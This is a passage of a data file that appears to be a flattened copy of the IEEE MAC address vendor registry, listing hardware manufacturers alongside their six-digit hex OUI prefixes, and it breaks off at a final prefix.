Telefonbau Behnke GmbH 889166 Viewcooper Corp. 103378 FLECTRON Co., LTD 14EDA5 Wächter GmbH Sicherheitssysteme 50C006 Carmanah Signs 04CB1D Traka plc A4E9A3 Honest Technology Co., Ltd A0E5E9 enimai Inc 9C216A TP-LINK TECHNOLOGIES CO.,LTD. F862AA xn systems 107BEF Zyxel Communications Corporation B462AD Elysia Germany GmbH 345C40 Cargt Holdings LLC 68193F Digital Airways B4750E Belkin International Inc. 94103E Belkin International Inc. 7CB733 ASKEY COMPUTER CORP 3051F8 BYK-Gardner GmbH E8F226 MILLSON CUSTOM SOLUTIONS INC. 44EE30 Budelmann Elektronik GmbH FC1E16 IPEVO corp 3C6E63 Mitron OY A4059E STA Infinity LLP A0BF50 S.C. ADD-PRODUCTION S.R.L. E8D4E0 Beijing BenyWave Technology Co., Ltd. FC019E VIEVU 642184 Nippon Denki Kagaku Co.,LTD 2464EF CYG SUNRI CO.,LTD. D8270C MaxTronic International Co., Ltd. B4CCE9 PROSYST C4D655 Tercel technology co.,ltd 58BDF9 Sigrand C0C687 Cisco SPVTG C49380 Speedytel technology 007DFA Volkswagen Group of America 2C7155 HiveMotion 20180E Shenzhen Sunchip Technology Co., Ltd 80B219 ELEKTRON TECHNOLOGY UK LIMITED E0AEB2 Bender GmbH & Co.KG F84A7F Innometriks Inc 74A4B5 Powerleader Science and Technology Co. Ltd. 909F43 Accutron Instruments Inc. 2894AF Samhwa Telecom AC5036 Pi-Coral Inc 0C9B13 Shanghai Magic Mobile Telecommunication Co.Ltd. 94BF1E eflow Inc. / Smart Device Planning and Development Division E8516E TSMART Inc. AC220B ASUSTek COMPUTER INC. B887A8 Step Ahead Innovations Inc. E0A198 NOJA Power Switchgear Pty Ltd 88354C Transics 3C6104 Juniper Networks CC4AE1 fourtec -Fourier Technologies 8C4B59 3D Imaging & Simulations Corp 5C3327 Spazio Italia srl 507691 Tekpea, Inc. 28F532 ADD-Engineering BV 9440A2 Anywave Communication Technologies, Inc. 1C86AD MCT CO., LTD. 28D93E Telecor Inc. 640B4A Digital Telecom Technology Limited 384233 Wildeboer Bauteile GmbH 3C8AB0 Juniper Networks C034B4 Gigastone Corporation CCE8AC SOYEA Technology Co.,Ltd. 70F176 Data Modul AG B847C6 SanJet Technology Corp. B8CD93 Penetek, Inc 28DB81 Shanghai Guao Electronic Technology Co., Ltd 3806B4 A.D.C. GmbH B8241A SWEDA INFORMATICA LTDA A0B100 ShenZhen Cando Electronics Co.,Ltd 201D03 Elatec GmbH E067B3 Shenzhen C-Data Technology Co., Ltd 1C4AF7 AMON INC E4776B AARTESYS AG 30F31D zte corporation A0EC80 zte corporation 0CC81F Summer Infant, Inc. A8FB70 WiseSec L.t.d E481B3 Shenzhen ACT Industrial Co.,Ltd. C06C6D MagneMotion, Inc. E880D8 GNTEK Electronics Co.,Ltd. 303EAD Sonavox Canada Inc F835DD Gemtek Technology Co., Ltd. D8B04C Jinan USR IOT Technology Co., Ltd. CC04B4 Select Comfort 5C15E1 AIDC TECHNOLOGY (S) PTE LTD E8519D Yeonhab Precision Co.,LTD DC5726 Power-One F8DADF EcoTech, Inc. 30AE7B Deqing Dusun Electron CO., LTD 68EC62 YODO Technology Corp. Ltd. 188857 Beijing Jinhong Xi-Dian Information Technology Corp. B8C855 Shanghai GBCOM Communication Technology Co.,Ltd. 78303B Stephen Technologies Co.,Limited CC1AFA zte corporation 6C8B2F zte corporation 8C5AF0 Exeltech Solar Products B0808C Laser Light Engines D8DCE9 Kunshan Erlab ductless filtration system Co.,Ltd DCD52A Sunny Heart Limited D866C6 Shenzhen Daystar Technology Co.,ltd D00EA4 Porsche Cars North America 784B08 f.robotics acquisitions ltd 84E4D9 Shenzhen NEED technology Ltd. 40BC73 CronoplastS.L. 4007C0 Railtec Systems GmbH A4D3B5 GLITEL Stropkov, s.r.o. D43A65 IGRS Engineering Lab Ltd. F499AC WEBER Schraubautomaten GmbH D05099 ASRock Incorporation A49EDB AutoCrib, Inc. 1C76CA Terasic Technologies Inc. 888964 GSI Electronics Inc. 7CD844 Enmotus Inc 44619C FONsystem co. ltd. 70820E as electronics GmbH 0C1105 AKUVOX (XIAMEN) NETWORKS CO., LTD 5C22C4 DAE EUN ELETRONICS CO., LTD F8FEA8 Technico Japan Corporation 1800DB Fitbit Inc. 78A106 TP-LINK TECHNOLOGIES CO.,LTD. 6C6126 Rinicom Holdings 88685C Shenzhen ChuangDao & Perpetual Eternal Technology Co.,Ltd 102831 Morion Inc. EC2C49 University of Tokyo D82916 Ascent Communication Technology 2CF203 EMKO ELEKTRONIK SAN VE TIC AS B4FE8C Centro Sicurezza Italia SpA 40E730 DEY Storage Systems, Inc. 68B094 INESA ELECTRON CO.,LTD A073FC Rancore Technologies Private Limited 44F849 Union Pacific Railroad CC0DEC Cisco SPVTG 1C37BF Cloudium Systems Ltd. 50ABBF Hoseo Telecom 0C722C TP-LINK TECHNOLOGIES CO.,LTD. 9CE635 Nintendo Co., Ltd. 60A44C ASUSTek COMPUTER INC. 185AE8 Zenotech.Co.,Ltd C47DCC Zebra Technologies Inc E0AEED LOENK E492E7 Gridlink Tech. Co.,Ltd. CC047C G-WAY Microwave 64535D Frauscher Sensortechnik 3C6FF7 EnTek Systems, Inc. 2C7B5A Milper Ltd D4BF2D SE Controls Asia Pacific Ltd E0D9A2 Hippih aps FC0647 Cortland Research, LLC 6CD146 FRAMOS GmbH 54E032 Juniper Networks 5461EA Zaplox AB D08B7E Passif Semiconductor 04586F Sichuan Whayer information industry Co.,LTD FC9FAE Fidus Systems Inc 681E8B InfoSight Corporation D052A8 Physical Graph Corporation CC3A61 SAMSUNG ELECTRO MECHANICS CO., LTD. F8D7BF REV Ritter GmbH 48BE2D Symanitron F02329 SHOWA DENKI CO.,LTD. F073AE PEAK-System Technik 48B8DE HOMEWINS TECHNOLOGY CO.,LTD. 10EA59 Cisco SPVTG 0C191F Inform Electronik 1065CF IQSIM 684CA8 Shenzhen Herotel Tech. Co., Ltd. 98208E Definium Technologies 704AE4 Rinstrum Pty Ltd 083AB8 Shinoda Plasma Co., Ltd. A0DD97 PolarLink Technologies, Ltd EC89F5 Lenovo Mobile Communication Technology Ltd. B49842 zte corporation 7054D2 PEGATRON CORPORATION 645A04 Chicony Electronics Co., Ltd. AC1702 Fibar Group sp. z o.o. 984CD3 Mantis Deposition 08606E ASUSTek COMPUTER INC. 3C57D5 FiveCo F84897 Hitachi, Ltd. F80BD0 Datang Telecom communication terminal (Tianjin) Co., Ltd. E89AFF Fujian LANDI Commercial Equipment Co.,Ltd 0C8CDC Suunto Oy 60C5A8 Beijing LT Honway Technology Co.,Ltd 28D244 LCFC(HeFei) Electronics Technology Co., Ltd. B4DF3B Chromlech 7C9A9B VSE valencia smart energy 84E714 Liang Herng Enterprise,Co.Ltd. B829F7 Blaster Tech E4A7FD Cellco Partnership 2CE2A8 DeviceDesign 00B56D David Electronics Co., LTD. 2C3557 ELLIY Power CO..Ltd B80415 Bayan Audio D4136F Asia Pacific Brands C8E1A7 Vertu Corporation Limited 4CAB33 KST technology F4472A Nanjing Rousing Sci. and Tech. Industrial Co., Ltd DC028E zte corporation A845E9 Firich Enterprises CO., LTD. 485261 SOREEL 646223 Cellient Co., Ltd. 98473C SHANGHAI SUNMON COMMUNICATION TECHNOGY CO.,LTD 5481AD Eagle Research Corporation 54A04F t-mac Technologies Ltd 14DB85 S NET MEDIA B8DAF1 Strahlenschutz- Entwicklungs- und Ausruestungsgesellschaft mbH D45C70 Wi-Fi Alliance EC473C Redwire, LLC 3CC12C AES Corporation 949BFD Trans New Technology, Inc. A00ABF Wieson Technologies Co., Ltd. 8CCDE8 Nintendo Co., Ltd. 7CB232 Hui Zhou Gaoshengda Technology Co.,LTD 00E666 ARIMA Communications Corp. 34BDFA Cisco SPVTG F41E26 Simon-Kaloi Engineering 702526 Nokia 18D949 Qvis Labs, LLC D808F5 Arcadia Networks Co. Ltd. 0CC47E EUCAST Co., Ltd. 50724D BEG Brueck Electronic GmbH 783CE3 Kai-EE B898B0 Atlona Inc. 24694A Jasmine Systems Inc. 080C0B SysMik GmbH Dresden DCBF90 HUIZHOU QIAOXING TELECOMMUNICATION INDUSTRY CO.,LTD. 049F06 Smobile Co., Ltd. 289A4B SteelSeries ApS A08C15 Gerhard D. Wempe KG 90CF6F Dlogixs Co Ltd C8FB26 Cisco SPVTG B85810 NUMERA, INC. ECD950 IRT SA 7C02BC Hansung Electronics Co. LTD B82410 Magneti Marelli Slovakia s.r.o. 105F49 Cisco SPVTG 1C5C60 Shenzhen Belzon Technology Co.,LTD. B8B94E Shenzhen iBaby Labs, Inc. ACC698 Kohzu Precision Co., Ltd. 7C386C Real Time Logic 2067B1 Pluto inc. 189A67 CSE-Servelec Limited 087D21 Altasec technology corporation F8051C DRS Imaging and Targeting Solutions 78D34F Pace-O-Matic, Inc. A4466B EOC Technology 901EDD GREAT COMPUTER CORPORATION 34D7B4 Tributary Systems, Inc. F40F9B WAVELINK 645FFF Nicolet Neuro AC7A42 iConnectivity 700BC0 Dewav Technology Company CC14A6 Yichun MyEnergy Domain, Inc 109FA9 Actiontec Electronics, Inc C0A364 3D Systems Massachusetts 1C5FFF Beijing Ereneben Information Technology Co.,Ltd Shenzhen Branch 6045BD Microsoft 241064 Shenzhen Ecsino Tecnical Co. Ltd 7CEBEA ASCT 9C0DAC Tymphany HK Limited 70B599 Embedded Technologies s.r.o. EC4C4D ZAO NPK RoTeK A4D18F Shenzhen Skyee Optical Fiber Communication Technology Ltd. 58343B Glovast Technology Ltd. 889676 TTC MARCONI s.r.o. 5C1737 I-View Now, LLC. AC0A61 Labor S.r.L. 1C43EC JAPAN CIRCUIT CO.,LTD 54D1B0 Universal Laser Systems, Inc 785262 Shenzhen Hojy Software Co., Ltd. 746A89 Rezolt Corporation 702F4B PolyVision Inc. 741489 SRT Wireless 241B13 Shanghai Nutshell Electronic Co., Ltd. 20014F Linea Research Ltd EC0ED6 ITECH INSTRUMENTS SAS 240917 Devlin Electronics Limited 9C54CA Zhengzhou VCOM Science and Technology Co.,Ltd B43564 Fujian Tian Cheng Electron Science & Technical Development Co.,Ltd. 00BF15 Genetec Inc. 38EE9D Anedo Ltd. 78BEBD STULZ GmbH D4DF57 Alpinion Medical Systems 5048EB BEIJING HAIHEJINSHENG NETWORK TECHNOLOGY CO. LTD. B40E96 HERAN 508C77 DIRMEIER Schanktechnik GmbH &Co KG 40704A Power Idea Technology Limited 545EBD NL Technologies F47F35 Cisco Systems, Inc BCC168 DinBox Sverige AB DC309C Heyrex Limited 2C00F7 XOS 28F606 Syes srl 0CAF5A GENUS POWER INFRASTRUCTURES LIMITED 7CEF8A Inhon International Ltd. 241125 Hutek Co., Ltd. B431B8 Aviwest CC187B Manzanita Systems, Inc. 08BE09 Astrol Electronic AG B41DEF Internet Laboratories, Inc. 809393 Xapt GmbH A007B6 Advanced Technical Support, Inc. 0CD2B5 Binatone Telecommunication Pvt. Ltd 4846F1 Uros Oy B827EB Raspberry Pi Foundation 84AF1F Beat System Service Co,. Ltd. B058C4 Broadcast Microwave Services, Inc 745798 TRUMPF Laser GmbH + Co. KG 2817CE Omnisense Ltd 3CCE73 Cisco Systems, Inc B0BD6D Echostreams Innovative Solutions 6044F5 Easy Digital Ltd. 90AC3F BrightSign LLC AC51EE Cambridge Communication Systems Ltd 78A183 Advidia A8D0E5 Juniper Networks F89955 Fortress Technology Inc 4CC94F Nokia 0CE5D3 DH electronics GmbH E425E9 Color-Chip 14B1C8 InfiniWing, Inc. E840F2 PEGATRON CORPORATION 50053D CyWee Group Ltd F88C1C KAISHUN ELECTRONIC TECHNOLOGY CO., LTD. BEIJING 1C0B52 EPICOM S.A 747E2D Beijing Thomson CITIC Digital Technology Co. LTD. 885C47 Alcatel Lucent 3CC1F6 Melange Systems Pvt. Ltd. 94FAE8 Shenzhen Eycom Technology Co., Ltd B48255 Research Products Corporation 8016B7 Brunel University 008DDA Link One Co., Ltd. C49805 Minieum Networks, Inc 90F4C1 Rand McNally 18193F Tamtron Oy 944444 LG Innotek 4C64D9 Guangdong Leawin Group Co., Ltd 940149 AutoHotBox 1CB094 HTC Corporation 9C0111 Shenzhen Newabel Electronic Co., Ltd. 400E67 Tremol Ltd. C0DF77 Conrad Electronic SE 3055ED Trex Network LLC F0F755 Cisco Systems, Inc 1CB243 TDC A/S 38BF33 NEC CASIO Mobile Communications B467E9 Qingdao GoerTek Technology Co., Ltd. 186751 KOMEG Industrielle Messtechnik GmbH 645EBE Yahoo! JAPAN CCC50A SHENZHEN DAJIAHAO TECHNOLOGY CO.,LTD 1CB17F NEC Platforms, Ltd. E42C56 Lilee Systems, Ltd. 48ED80 daesung eltec C80718 TDSi 581D91 Advanced Mobile Telecom co.,ltd. D8BF4C Victory Concept Electronics Limited 3CB9A6 Belden Deutschland GmbH 8C0CA3 Amper 94DF58 IJ Electron CO.,Ltd. 48D54C Jeda Networks 8CDE52 ISSC Technologies Corp. 082522 ADVANSEE 4C2F9D ICM Controls E467BA Danish Interpretation Systems A/S BCB852 Cybera, Inc. C49300 8Devices 6CA682 EDAM information & communications 28D576 Premier Wireless, Inc. 70D6B6 Metrum Technologies C0A0DE Multi Touch Oy 40BC8B itelio GmbH 9CA134 Nike, Inc. 50FC30 Treehouse Labs B89674 AllDSP GmbH & Co. KG 48E1AF Vity 1CBBA8 OJSC Ufimskiy Zavod Promsvyaz 006BA0 SHENZHEN UNIVERSAL INTELLISYS PTE LTD A898C6 Shinbo Co., Ltd. B4211D Beijing GuangXin Technology Co., Ltd 903CAE Yunnan KSEC Digital Technology Co.,Ltd. 70704C Purple Communications, Inc D89760 C2 Development, Inc. F47ACC SolidFire, Inc. 905682 Lenbrook Industries Limited F0DA7C RLH INDUSTRIES,INC. AC319D Shenzhen TG-NET Botone Technology Co.,Ltd. 20107A Gemtek Technology Co., Ltd. 78DDD6 c-scape C09132 Patriot Memory 90185E Apex Tool Group GmbH & Co OHG F8FE5C Reciprocal Labs Corp 6C9CED Cisco Systems, Inc 2486F4 Ctek, Inc. C4237A WhizNets Inc. F4E6D7 Solar Power Technologies, Inc. B87424 Viessmann Elektronik GmbH B451F9 NB Software 30168D ProLon E4AFA1 HES-SO A887ED ARC Wireless LLC D4D249 Power Ethernet 80427C Adolf Tedsen GmbH & Co. KG E0DADC JVC KENWOOD Corporation E843B6 QNAP Systems, Inc. B89BC9 SMC Networks Inc 409FC7 BAEKCHUN I&C Co., Ltd. 00FC58 WebSilicon Ltd. 983571 Sub10 Systems Ltd 5404A6 ASUSTek COMPUTER INC. 186D99 Adanis Inc. A0E201 AVTrace Ltd.(China) F0DEB9 ShangHai Y&Y Electronics Co., Ltd 7CA61D MHL, LLC 9CF67D Ricardo Prague, s.r.o. F82F5B eGauge Systems LLC 98C845 PacketAccess 989080 Linkpower Network System Inc Ltd. F83376 Good Mind Innovation Co., Ltd. 50F61A Kunshan JADE Technologies co., Ltd. 542018 Tely Labs 581FEF Tuttnaer LTD 58BDA3 Nintendo Co., Ltd. F8F25A G-Lab GmbH 307ECB SFR 68F125 Data Controls Inc. BC764E Rackspace US, Inc. CCC8D7 CIAS Elettronica srl 84D32A IEEE 1905.1 4C0289 LEX COMPUTECH CO., LTD C0E54E ARIES Embedded GmbH F8C001 Juniper Networks 187C81 Valeo Vision Systems ACCC8E Axis Communications AB 8C94CF Encell Technology, Inc. 6CA780 Nokia Corporation 3057AC IRLAB LTD. 842B50 Huria Co.,Ltd. 48F7F1 Nokia 8C8E76 taskit GmbH A0133B HiTi Digital, Inc. 9C5711 Feitian Xunda(Beijing) Aeronautical Information Technology Co., Ltd. 88F488 cellon communications technology(shenzhen)Co.,Ltd. 448E12 DT Research, Inc. B8BB6D ENERES Co.,Ltd. 14373B PROCOM Systems 1897FF TechFaith Wireless Technology Limited 4C5585 Hamilton Systems ECEA03 DARFON LIGHTING CORP 30F9ED Sony Corporation 582EFE Lighting Science Group CC60BB Empower RF Systems 7CDD20 IOXOS Technologies S.A. ECF236 NEOMONTANA ELECTRONICS 0418B6 Private E4A5EF TRON LINK ELECTRONICS CO., LTD. 3071B2 Hangzhou Prevail Optoelectronic Equipment Co.,LTD. DCCE41 FE GLOBAL HONG KONG LIMITED FC6C31 LXinstruments GmbH 705CAD Konami Gaming Inc 3C6F45 Fiberpro Inc. 703187 ACX GmbH 30E4DB Cisco Systems, Inc 88E0F3 Juniper Networks 80971B Altenergy Power System,Inc. 587675 Beijing ECHO Technologies Co.,Ltd 0C51F7 CHAUVIN ARNOUX 0CFC83 Airoha Technology Corp., 007F28 Actiontec Electronics, Inc 804731 Packet Design, Inc. B09BD4 GNH Software India Private Limited F08BFE COSTEL.,CO.LTD 3C26D5 Sotera Wireless E84E06 EDUP INTERNATIONAL (HK) CO., LTD 00077D Cisco Systems, Inc CCD9E9 SCR Engineers Ltd. 34A709 Trevil srl E0C922 Jireh Energy Tech., Ltd. 905F8D modas GmbH 98293F Fujian Start Computer Equipment Co.,Ltd B45CA4 Thing-talk Wireless Communication Technologies Corporation Limited 908D1D GH Technologies 444F5E Pan Studios Co.,Ltd. D0AFB6 Linktop Technology Co., LTD 98EC65 Cosesy ApS ACC935 Ness Corporation 008D4E CJSC NII STT 98F8DB Marini Impianti Industriali s.r.l. E41289 topsystem Systemhaus GmbH 58E808 AUTONICS CORPORATION DC05ED NabtescoCorporation 4C98EF Zeo 00A1DE ShenZhen ShiHua Technology CO.,LTD 806CBC NET New Electronic Technology GmbH 909060 RSI VIDEO TECHNOLOGIES BC8199 BASIC Co.,Ltd. DCA7D9 Compressor Controls Corp 38FEC5 Ellips B.V. C455A6 Cadac Holdings Ltd 5C7757 Haivision Network Video D4D898 Korea CNO Tech Co., Ltd B4AA4D Ensequence, Inc. B83D4E Shenzhen Cultraview Digital Technology Co.,Ltd Shanghai Branch 5087B8 Nuvyyo Inc C0EAE4 Sonicwall 0838A5 Funkwerk plettac electronic GmbH CC1EFF Metrological Group BV 184E94 MESSOA TECHNOLOGIES INC. 6C391D Beijing ZhongHuaHun Network Information center 80B32A UK Grid Solutions Ltd 405539 Cisco Systems, Inc E0F211 Digitalwatt F86971 Seibu Electric Co., 44AA27 udworks Co., Ltd. E8F928 RFTECH SRL 1C955D I-LAX ELECTRONICS INC. 60F59C CRU-Dataport B0A72A Ensemble Designs, Inc. 6400F1 Cisco Systems, Inc B8F4D0 Herrmann Ultraschalltechnik GmbH & Co. Kg 08ACA5 Benu Video, Inc. 586D8F Cisco-Linksys, LLC 10E3C7 Seohwa Telecom 7465D1 Atlinks 040A83 Alcatel-Lucent C45600 Galleon Embedded Computing BC3E13 Accordance Systems Inc. A81B18 XTS CORP D0A311 Neuberger Gebäudeautomation GmbH 041D10 Dream Ware Inc. 801440 Sunlit System Technology Corp 180B52 Nanotron Technologies GmbH DC07C1 HangZhou QiYang Technology Co.,Ltd. C0A26D Abbott Point of Care 00BB8E HME Co., Ltd. D82A7E Nokia Corporation 801F02 Edimax Technology Co. Ltd. 58EECE Icon Time Systems 647FDA TEKTELIC Communications Inc. AC0613 Senselogix Ltd 747818 Jurumani Solutions E01F0A Xslent Energy Technologies. LLC 443719 2 Save Energy Ltd 84EA99 Vieworks E00C7F Nintendo Co., Ltd. E48AD5 RF WINDOW CO., LTD. FCF1CD OPTEX-FA CO.,LTD. 4425BB Bamboo Entertainment Corporation 7CDA84 Dongnian Networks Inc. BCC61A SPECTRA EMBEDDED SYSTEMS 0470BC Globalstar Inc. 88DD79 Voltaire 64F987 Avvasi Inc. D85D84 CAx soft GmbH D4E32C S. Siedle & Sohne 7C6ADB SafeTone Technology Co.,Ltd 902E87 LabJack A424B3 FlatFrog Laboratories AB 94CDAC Creowave Oy 144C1A Max Communication GmbH 340804 D-Link Corporation F05D89 Dycon Limited AC80D6 Hexatronic AB 9CF938 AREVA NP GmbH 8CDB25 ESG Solutions FC3598 Favite Inc. 90D92C HUG-WITSCHI AG 988E34 ZHEJIANG BOXSAM ELECTRONIC CO.,LTD C471FE Cisco Systems, Inc 4022ED Digital Projection Ltd 989449 Skyworth Wireless Technology Ltd. 2CA157 acromate, Inc. 942053 Nokia Corporation 28852D Touch Networks B8BA68 Xi'an Jizhong Digital Communication Co.,Ltd B0B32B Slican Sp. z o.o. 5842E4 Baxter International Inc B8797E Secure Meters (UK) Limited CC9E00 Nintendo Co., Ltd. 58A76F iD corporation 0006F6 Cisco Systems, Inc 747DB6 Aliwei Communications, Inc B06563 Shanghai Railway Communication Factory 4018D7 Smartronix, Inc. 4C2C80 Beijing Skyway Technologies Co.,Ltd D49E6D Wuhan Zhongyuan Huadian Science & Technology Co., 6C2E33 Accelink Technologies Co.,Ltd. 40987B Aisino Corporation BC38D2 Pandachip Limited 2005E8 OOO InProMedia F00248 SmarteBuilding AC6F4F Enspert Inc E82877 TMY Co., Ltd. F0C88C LeddarTech Inc. 4037AD Macro Image Technology, Inc. 28ED58 JAG Jakob AG 486B91 Fleetwood Group Inc. 643409 BITwave Pte Ltd 40C245 Shenzhen Hexicom Technology Co., Ltd. CC55AD RIM E8757F FIRS Technologies(Shenzhen) Co., Ltd F0F7B3 Phorm 00D38D Hotel Technology Next Generation C83EA7 KUNBUS GmbH 60893C Thermo Fisher Scientific P.O.A. D86BF7 Nintendo Co., Ltd. 74CD0C Smith Myers Communications Ltd. CCCE40 Janteq Corp B8EE79 YWire Technologies, Inc. 74D675 WYMA Tecnologia B40EDC LG-Ericsson Co.,Ltd. E0EE1B Panasonic Automotive Systems Company of America 74BE08 ATEK Products, LLC 6063FD Transcend Communication Beijing Co.,Ltd. D8B6C1 NetworkAccountant, Inc. 74A4A7 QRS Music Technologies, Inc. 700258 01DB-METRAVIB F455E0 Niceway CNC Technology Co.,Ltd.Hunan Province 20FDF1 3COM EUROPE LTD 8497B8 Memjet Inc. A0DDE5 SHARP Corporation 206AFF Atlas Elektronik UK Limited AC34CB Shanhai GBCOM Communication Technology Co. Ltd 9088A2 IONICS TECHNOLOGY ME LTDA 40CD3A Z3 Technology 482CEA Motorola Inc Business Light Radios 00336C SynapSense Corporation 2CD1DA Sanjole, Inc. F866F2 Cisco Systems, Inc AC6123 Drivven, Inc. 100C24 pomdevices, LLC 58F6BF Kyoto University 78EC22 Shanghai Qihui Telecom Technology Co., LTD 0C15C5 SDTEC Co., Ltd. FC75E6 Handreamnet A0A763 Polytron Vertrieb GmbH EC2368 IntelliVoice Co.,Ltd. 749050 Renesas Electronics Corporation 389592 Beijing Tendyron Corporation A4218A Nortel Networks F8FB2F Santur Corporation 2CCD43 Summit Technology Group 64995D LGE 7CEF18 Creative Product Design Pty. Ltd. FC7CE7 FCI USA LLC 145412 Entis Co., Ltd. 7C3E9D PATECH 244597 GEMUE Gebr. Mueller Apparatebau 78818F Server Racks Australia Pty Ltd 284846 GridCentric Inc. 30694B RIM 6C626D Micro-Star INT'L CO., LTD 28068D ITL, LLC C00D7E Additech, Inc. 84C7A9 C3PO S.A. D87157 Lenovo Mobile Communication Technology Ltd. 609AA4 GVI SECURITY INC. 641084 HEXIUM Technical Development Co., Ltd. 342109 Jensen Scandinavia AS 3C106F ALBAHITH TECHNOLOGIES 0CDDEF Nokia Corporation ECFE7E BlueRadios, Inc. E4AD7D SCL Elements F09CBB RaonThink Inc. 10CCDB AXIMUM PRODUITS ELECTRONIQUES 38C7BA CS Services Co.,Ltd. EC5C69 MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD. 6C92BF Inspur Electronic Information Industry Co.,Ltd. 44A8C2 SEWOO TECH CO., LTD 80EE73 Shuttle Inc. FCE23F CLAY PAKY SPA 58570D Danfoss Solar Inverters C4823F Fujian Newland Auto-ID Tech. Co,.Ltd. E85B5B LG ELECTRONICS INC BCA9D6 Cyber-Rain, Inc. 6C3E9C KE Knestel Elektronik GmbH 8CD628 Ikor Metering 243C20 Dynamode Group 3C39C3 JW Electronics Co., Ltd. 3C05AB Product Creation Studio F04335 DVN(Shanghai)Ltd. A479E4 KLINFO Corp 481BD2 Intron Scientific co., ltd. D0F0DB Ericsson 7C1476 Damall Technologies SAS 8C541D LGE 00A2DA INAT GmbH 003CC5 WONWOO Engineering Co., Ltd F077D0 Xcellen 4CC602 Radios, Inc. 80711F Juniper Networks 88FD15 LINEEYE CO., LTD 884B39 Siemens AG, Healthcare Sector D828C9 General Electric Consumer and Industrial 44C233 Guangzhou Comet Technology Development Co.Ltd 30EFD1 Alstom Strongwish (Shenzhen) Co., Ltd. 7C2CF3 Secure Electrans Ltd 081651 SHENZHEN SEA STAR TECHNOLOGY CO.,LTD A863DF DISPLAIRE CORPORATION 183BD2 BYD Precision Manufacture Company Ltd. E43593 Hangzhou GoTo technology Co.Ltd 2C3A28 Fagor Electrónica B45861 CRemote, LLC B0973A E-Fuel Corporation 204E6B Axxana(israel) ltd 80F593 IRCO Sistemas de Telecomunicación S.A. E497F0 Shanghai VLC Technologies Ltd. Co. B40832 TC Communications ECDE3D Lamprey Networks, Inc. 6CFFBE MPB Communications Inc. 304174 ALTEC LANSING LLC 80B289 Forworld Electronics Ltd. E83A97 Toshiba Corporation 1056CA Peplink International Ltd. 486FD2 StorSimple Inc A03A75 PSS Belgium N.V. 24DBAD ShopperTrak RCT Corporation 9CEBE8 BizLink (Kunshan) Co.,Ltd 040EC2 ViewSonic Mobile China Limited C8D1D1 AGAiT Technology Corporation 00DB45 THAMWAY CO.,LTD. D49C28 JayBird LLC 74F726 Neuron Robotics 2872C5 Smartmatic Corp E08FEC REPOTEC CO., LTD. ACE9AA Hay Systems Ltd 082AD0 SRD Innovations Inc. 889821 TERAON E0E751 Nintendo Co., Ltd. 003AAF BlueBit Ltd. 64168D Cisco Systems, Inc 003A9C Cisco Systems, Inc 7C6C8F AMS NEVE LTD 9CB206 PROCENTEC 88ED1C Cudo Communication Co., Ltd. 9CCD82 CHENG UEI PRECISION INDUSTRY CO.,LTD F06281 ProCurve Networking by HP C09C92 COBY C038F9 Nokia Danmark A/S F46349 Diffon Corporation 74F07D BnCOM Co.,Ltd F852DF VNL Europe AB A8CB95 EAST BEST CO., LTD. F45FF7 DQ Technology Inc. 7C3BD5 Imago Group 5CE223 Delphin Technology AG F871FE The Goldman Sachs Group, Inc. 2C1984 IDN Telecom, Inc. D8C3FB DETRACOM 58F67B Xia Men UnionCore Technology LTD. 6CF049 GIGA-BYTE TECHNOLOGY CO.,LTD. 644F74 LENUS Co., Ltd. 787F62 GiK mbH 401597 Protect America, Inc. C4FCE4 DishTV NZ Ltd E80B13 Akib Systems Taiwan, INC EC6C9F Chengdu Volans Technology CO.,LTD 40EF4C Fihonest communication co.,Ltd 00271E Xagyl Communications 00271D Comba Telecom Systems (China) Ltd. 002720 NEW-SOL COM 0026F0 cTrixs International GmbH. 0026EA Cheerchip Electronic Technology (ShangHai) Co., Ltd. 002708 Nordiag ASA 002702 SolarEdge Technologies 002704 Accelerated Concepts, Inc 0026FA BandRich Inc. 0026F9 S.E.M. srl 0026FD Interactive Intelligence 0026F7 Nivetti Systems Pvt. Ltd. 0026F6 Military Communication Institute 0026DD Fival Science & Technology Co.,Ltd. 0026DE FDI MATELEC 0026DA Universal Media Corporation /Slovakia/ s.r.o. 0026DB Ionics EMS Inc. 0026D5 Ory Solucoes em Comercio de Informatica Ltda. 0026CE Kozumi USA Corp. 002711 LanPro Inc 002686 Quantenna Communcations, Inc. 002684 KISAN SYSTEM 002680 SIL3 Pty.Ltd 0026BF ShenZhen Temobi Science&Tech Development Co.,Ltd 0026B4 Ford Motor Company 0026CA Cisco Systems, Inc 0026C9 Proventix Systems, Inc. 002690 I DO IT 00268F MTA SpA 002679 Euphonic Technologies, Inc. 0026AC Shanghai LUSTER Teraband photonic Co., Ltd. 0026A6 TRIXELL 00269C ITUS JAPAN CO. LTD 002694 Senscient Ltd 002676 COMMidt AS 00261D COP SECURITY SYSTEM CORP. 002617 OEM Worldwide 002613 Engel Axil S.L. 002638 Xia Men Joyatech Co., Ltd. 00263A Digitec Systems 00260F Linn Products Ltd 00260C Dataram 00262B Wongs Electronics Co. Ltd. 002620 ISGUS GmbH 002601 Cutera Inc 002635 Bluetechnix GmbH 002657 OOO NPP EKRA 002652 Cisco Systems, Inc 002666 EFM Networks 0025F5 DVS Korea, Co., Ltd 0025EB Reutech Radar Systems (PTY) Ltd 0025EE Avtex Ltd 0025AE Microsoft Corporation 0025AF COMFILE Technology 0025A8 Kontron (BeiJing) Technology Co.,Ltd 0025D9 DataFab Systems Inc. 0025D6 The Kroger Co. 0025D1 Eastern Asia Technology Limited 0025CD Skylane Optics 0025BF Wireless Cables Inc. 0025B9 Cypress Solutions Inc 0025B6 Telecom FM 0025A5 Walnut Media Network 0025A4 EuroDesign embedded technologies GmbH 0025C1 Nawoo Korea Corp. 0025F6 netTALK.com, Inc. 00257A CAMCO Produktions- und Vertriebs-GmbH fürBeschallungs- und Beleuchtungsanlagen 002576 NELI TECHNOLOGIES 002574 KUNIMI MEDIA DEVICE Co., Ltd. 002559 Syphan Technologies Ltd 002554 Pixel8 Networks 002540 Quasar Technologies, Inc. 002533 WITTENSTEIN AG 002530 Aetas Systems Inc. 00252C Entourage Systems, Inc. 00258C ESUS ELEKTRONIK SAN. VE DIS. TIC. LTD. STI. 00255A Tantalus Systems Corp. 002587 Vitality, Inc. 002573 ST Electronics (Info-Security) Pte Ltd 00256F Dantherm Power 00252F Energy, Inc. 00250A Security Expert Co. Ltd 002505 eks Engel GmbH & Co. KG 002509 SHARETRONIC Group LTD 0024DA Innovar Systems Limited 0024D8 IlSung Precision 0024CD Willow Garage, Inc. 0024D3 QUALICA Inc. 0024CE Exeltech Inc 0024CF Inscape Data Corporation 0024C6 Hager Electro SAS 0024FD Accedian Networks Inc 002523 